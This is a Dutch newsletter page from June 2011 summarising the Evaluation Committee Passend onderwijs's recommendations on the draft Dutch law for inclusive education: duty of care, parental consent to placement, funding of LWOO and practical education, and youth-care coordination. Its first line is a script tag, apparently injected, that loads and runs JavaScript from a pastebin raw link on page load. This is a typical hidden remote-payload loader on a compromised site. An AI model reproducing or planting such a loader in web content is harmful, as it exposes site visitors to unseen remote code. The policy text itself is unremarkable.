<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws


nieuwsbrief infopunt passend onderwijs 08 juni 2011
8 juni 2011


ECPO adviseert over wetsvoorstel Passend onderwijsVolgens het advies van de Evaluatiecommissie Passend onderwijs (ECPO) biedt het wetsvoorstel na een lange periode van onduidelijkheid meer zicht op de koers voor Passend onderwijs, doorbreekt het de huidige onderscheidingen in vormen van zorg en haalt het prikkels voor strategisch gedrag weg. De ECPO doet een aantal aanbevelingen om de voorstellen verder te verbeteren.

De ECPO adviseert het begrip zorgplicht in de wet zelf op te nemen. De term wordt namelijk nergens in het wetsvoorstel vermeld en ook niet verder toegelicht.
De ECPO adviseert vast te leggen dat het bestuur van de school van aanmelding de eerstverantwoordelijke is voor de naleving van de zorgplicht en dat binnen het samenwerkingsverband bindende afspraken worden gemaakt over de uitvoering en de (algemene) toegankelijkheid van onderwijsvoorzieningen. Anders zouden leerlingen alsnog tussen wal en schip terecht kunnen komen.
De ECPO adviseert de maximale lengte van de periode van aanmelding, toelating en plaatsing te bekorten. Het kan onder de wet zo zijn dat een toelatingsproces acht maanden in beslag kan nemen.
De ECPO adviseert de samenwerkingsverbanden PO en VO te verplichten hun activiteiten op elkaar af te stemmen en aandacht te besteden aan de overgang van leerlingen van het primair naar het voortgezet onderwijs. Dit is in het voorstel niet geregeld.
De ECPO adviseert eisen te stellen aan het juridisch construct en de besluitvorming van het bestuur van de samenwerkingsverbanden. Zo kan het risico van trage besluitvorming en marginalisering van het (voortgezet) speciaal onderwijs worden voorkomen.
De ECPO adviseert scholen voor speciaal onderwijs alleen te verplichten aan een samenwerkingsverband deel te nemen wanneer een substantieel deel van hun leerlingen uit het betreffende samenwerkingsverband afkomstig is.
De ECPO adviseert de toekenning van extra ondersteuning in de vorm van LWOO en Praktijkonderwijs op dezelfde wijze te regelen als die van andere vormen van extra ondersteuning. Het is ongewenst dat het LWOO en het Praktijkonderwijs buiten beschouwing blijven.
De ECPO adviseert te regelen dat er in alle samenwerkingsverbanden sprake zal zijn van deskundige zorgtoewijzing op basis van transparante procedures en objectiveerbare criteria, waarbij de risicoís van rechtsonzekerheid en rechtsongelijkheid tot een minimum worden beperkt. Niet alleen is er onder de nieuwe wet het risico dat iedereen het wiel gaat uitvinden, maar ook dat rechtsongelijkheid kan ontstaan als samenwerkingsverbanden verschillende criteria gaan hanteren.
De ECPO adviseert het werken met een zgn. ontwikkelingsperspectief niet wettelijk vast te leggen en als dit wel gebeurt in het toezichtkader van de inspectie vast te leggen dat deze niet als parameter voor de kwaliteit van het onderwijs gebruikt mogen worden. Dit lokt namelijk strategisch gedrag uit: de perspectieven zullen laag worden gesteld om zo het risico te vermijden van een negatieve beoordeling.
De ECPO adviseert bij wet te regelen dat, waar extra onderwijszorg nodig is, verwijzing naar en plaatsing op een andere school dan die van de eerste voorkeur van de ouders alleen met instemming van de ouders kan plaatsvinden. Anders zou de wet een verzwakking van de positie van de ouders betekenen. De ECPO adviseert verder dat de ouders een onafhankelijke geschillencommissie op het niveau van het samenwerkingsverband kunnen inschakelen bij verschil van inzicht over plaatsing of verwijzing.
De ECPO adviseert maatregelen te treffen die het mogelijk maken dat de bestaande expertise van het speciaal onderwijs op landelijk niveau behouden blijft en verder ontwikkeld kan worden. Met het verdwijnen van de recís komt behoud van expertise in gevaar.
De ECPO adviseert het speciaal onderwijs in de samenwerkingsverbanden een status toe te kennen die recht doet aan de in deze tak van onderwijs aanwezige expertise.
De ECPO adviseert te regelen dat bij ondersteuning vanuit de jeugdzorg wordt vastgelegd wie waarvoor verantwoordelijk is en hoe de zorg vanuit het onderwijs en die vanuit de jeugdzorg op elkaar worden afgestemd.
De ECPO adviseert om de gemeenten te verzoeken bij gemeentelijke samenwerking op het terrein van de jeugdzorg rekening te houden met de grenzen van de samenwerkingsverbanden primair onderwijs en voortgezet onderwijs. De ECPO adviseert bij de nieuwe Wet op de Jeugdzorg te onderzoeken in hoeverre wijziging van de onderwijswetgeving nodig is.
De ECPO adviseert duidelijk te maken welke functie het landelijk referentiekader van de sectorraden vervult en welke verantwoordelijkheid de overheid draagt voor de inhoud van dit referentiekader. De ECPO adviseert bij het expliciteren van criteria niet alleen op het (nog niet voltooide) referentiekader te vertrouwen, maar hierover in wet- en regelgeving zelf uitspraken te doen.
De ECPO adviseert wettelijk vast te leggen welke concrete en toetsbare doelen met passend onderwijs worden beoogd en de samenwerkingsverbanden te verplichten in het zorgplan aan te geven hoe men deze doelen gaat realiseren en toetsen.
De ECPO adviseert de samenwerkingsverbanden te verplichten in het zorgplan te formuleren hoe men de professionalisering en ondersteuning van de leerkrachten gaat aanpakken.
De ECPO adviseert de afwijkende bekostigingssystematiek voor het LWOO en het praktijkonderwijs, zo snel als mogelijk is, in overeenstemming te brengen met de bekostigingssystematiek zoals die geldt voor de overige speciale onderwijszorg.
De ECPO adviseert de verdeling van de bezuinigingen over primair en voortgezet onderwijs opnieuw onder de loep te nemen om na te gaan of het primair onderwijs niet een onevenredig zware bijdrage levert aan de bezuinigingen.
De ECPO adviseert ten slotte de wet het karakter te geven van een interim-wet. Het advies van de ECPO kunt u downloaden van de website www.passendonderwijs, tabblad Beleid.

Op 22 juni 2011 zal de Tweede Kamer in een Algemeen overleg opnieuw spreken over Passend onderwijs. Het advies van de ECPO zal daarbij ongetwijfeld een rol spelen, naast de opbrengsten van de 160 en 7 gesprekken met respectievelijk de besturen PO/VO en de besturen (v)so. Datzelfde geldt voor de overige gesprekken met belanghebbenden uit het onderwijs(veld) en de raden.


--------------------------------------------------------------------------------

Passend onderwijs in de klas

Passend onderwijs betekent meer dan ooit dat de leraar aan zet is. Kennis van leerlijnen, goed klassenmanagement, hoge instructiekwaliteit, een positief leerklimaat, systematisch volgen van leerprocessen, samenwerken met collegaís.
Klik hier extra informatie

<< Terug